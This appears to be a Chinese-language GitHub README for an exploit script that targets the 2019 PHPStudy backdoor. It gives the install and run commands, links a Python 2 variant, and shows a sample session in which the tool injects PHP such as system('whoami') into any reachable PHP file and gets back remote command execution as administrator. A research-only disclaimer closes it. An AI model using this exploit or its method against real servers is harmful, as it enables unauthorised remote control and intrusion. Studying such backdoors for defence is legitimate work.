# PHPStudy_BackDoor_Exp
PHPStudy后门事件 EXP
适用于Python3
![](https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp/blob/master/img/20190924002758664.png)
# 适用于Python2.x的版本
[Bug-Project-Framework](https://github.com/Fplyth0ner-Combie/Bug-Project-Framework/blob/master/weapon/phpstudy%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/phpstudy%20backdoor.py)
# 使用方法
```
python3 -m pip install requests,choice
λ python3 phpstudy_backdoor.py
_____ _ _ _____ _____ _ _ ____ _ _
| __ \ | | | || __ \ / ____|| | | | | _ \ | | | |
| |__) || |__| || |__) || (___ | |_ _ _ __| | _ _ | |_) | __ _ ___ | | __ __| | ___ ___ _ __
| ___/ | __ || ___/ \___ \ | __|| | | | / _` || | | | | _ < / _` | / __|| |/ // _` | / _ \ / _ \ | '__|
| | | | | || | ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ | <| (_| || (_) || (_) || |
|_| |_| |_||_| |_____/ \__| \__,_| \__,_| \__, | |____/ \__,_| \___||_|\_\\__,_| \___/ \___/ |_|
__/ |
|___/
Usage & e.g. :
Target Url:
localhost/flag.php
Input Your Command:
phpinfo();
Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
By:Sp4ce
Have Fun
Target Url:
localhost/flag.php
Input Your Command:
system("whoami");
[+] Command Execute Successful.
desktop-XXXX\administrator
```
# 注意
1. `flag.php`可以使任意可访问到的php文件,必须填写完整!
2. **脚本仅用于安全研究,请勿用于非法用途!**